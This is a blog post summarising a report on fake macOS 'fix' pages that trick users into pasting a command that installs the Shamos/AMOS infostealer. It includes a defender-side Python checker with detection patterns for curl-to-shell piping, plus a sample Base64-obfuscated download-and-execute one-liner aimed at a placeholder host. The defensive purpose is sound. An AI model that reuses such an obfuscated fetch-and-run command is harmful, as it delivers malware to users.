Fake Mac Fixes fixes absolutely nothing

There is a new piece of software that Mac users will not want. It is an infostealer, and it can take practically everything it wants from the Mac.

The second paragraph highlights what it can do. It says:

The new malware, which is a variant of the Atomic macOS Stealer (AMOS), was developed by the cybercriminal group “COOKIE SPIDER,” and is used to steal data and credentials stored in web browsers, Keychain items, Apple Notes, and cryptocurrency wallets.

CrowdStrike has been monitoring this for some time now, and the article goes into detail about what this thing does.

The threat actors prompt users to run these commands to install software or fix fake errors, but when executed, they actually download and execute the malware on the device.

GitHub is part of the problem by allowing this type of hosting to be on their platform to begin with. I try to do my best to know what my network has on it, and if there’s a problem, it gets dealt with either by me or the provider who runs it.

The ads or spoofed pages (mac-safer[.]com, rescue-mac[.]com) claim to provide help with macOS problems people are likely to search for, containing instructions directing them to copy and paste the command to fix the issue.

Apparently, these are pages in sponsored results, and not part of the general results.

The article does state to use official channels such as the Apple support forums or calling Apple directly to get help. (800) 275-2273 is their telephone number.

The article says:

Instead of fixing anything, the command decodes a Base64-encoded URL and fetches a malicious Bash script from a remote server.
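A defender-side check for the pattern quoted above, added here as an example (it is not code from the article or from CrowdStrike): it inspects a pasted one-liner before anyone runs it, decodes any Base64 tokens, and flags a hidden URL that feeds a download or a shell. The sample command, the function names and the example.invalid URL are constructed for illustration.

```python
import base64
import re

# Long runs of the Base64 alphabet, enough to hide a URL.
B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")
FETCHERS = re.compile(r"\b(curl|wget)\b")
DECODERS = re.compile(r"\bbase64\s+(-d|-D|--decode)\b")
# "... | bash", "... | sudo sh", or "bash -c ..." style execution.
SHELLS = re.compile(r"\|\s*(sudo\s+)?(ba|z)?sh\b|\b(ba|z)?sh\s+-c\b")


def decoded_urls(command: str) -> list[str]:
    """Return http(s) URLs hidden inside Base64 tokens of a pasted command."""
    urls = []
    for token in B64_TOKEN.findall(command):
        padded = token + "=" * (-len(token) % 4)
        try:
            text = base64.b64decode(padded, validate=True).decode("utf-8").strip()
        except (ValueError, UnicodeDecodeError):
            continue  # not valid Base64 text, e.g. a long path or word
        if re.match(r"https?://", text):
            urls.append(text)
    return urls


def review_command(command: str) -> dict:
    """Classify a copy-paste terminal command before anyone runs it."""
    hidden = decoded_urls(command)
    fetches = bool(FETCHERS.search(command))
    to_shell = bool(SHELLS.search(command))
    decodes = bool(DECODERS.search(command))
    if hidden and (fetches or to_shell):
        verdict = "block"    # obfuscated URL feeding a download or a shell
    elif (fetches and to_shell) or decodes:
        verdict = "review"   # download-and-execute, or decoding at run time
    else:
        verdict = "ok"
    return {"verdict": verdict, "hidden_urls": hidden,
            "fetches": fetches, "pipes_to_shell": to_shell}


# Constructed sample: same shape as the lure described, harmless placeholder URL.
_B64 = base64.b64encode(b"https://example.invalid/fix.sh").decode()
SAMPLE = f"curl -fsSL $(echo {_B64} | base64 -d) | bash"

if __name__ == "__main__":
    print(review_command(SAMPLE))
```

A help desk or a clipboard-monitoring script could run `review_command` on any "fix" command a user is told to paste and surface the decoded URL before it is executed.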

There’s much more. The article is titled “Fake Mac fixes trick users into installing new Shamos infostealer,” if you are interested in reading it.

Thanks for reading!

